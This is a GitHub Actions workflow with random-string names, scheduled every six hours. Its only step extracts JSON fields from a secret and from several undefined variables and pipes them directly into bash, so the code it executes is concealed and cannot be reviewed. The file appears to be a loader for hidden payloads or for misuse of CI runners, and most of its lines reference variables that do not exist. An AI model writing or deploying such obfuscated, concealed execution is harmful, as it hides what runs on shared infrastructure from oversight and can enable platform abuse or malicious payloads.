name: gantingxi3810
on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gantingxi3810
        env:
          rkhz1: ${{ secrets.rkhz1 }}
        run: |
          echo $rkhz1 | jq -r .v782 | /bin/bash
          echo $m3651 | jq -r .jzs210 | /bin/bash
          echo $m392 | jq -r .qhieu7053 | /bin/bash
          echo $z1393 | jq -r .expt00 | /bin/bash
          echo $l29797 | jq -r .v8 | /bin/bash
          echo $k26 | jq -r .kvq5 | /bin/bash
          echo $syy12961 | jq -r .yk3634 | /bin/bash
          echo $ymu67929 | jq -r .rcgz6 | /bin/bash

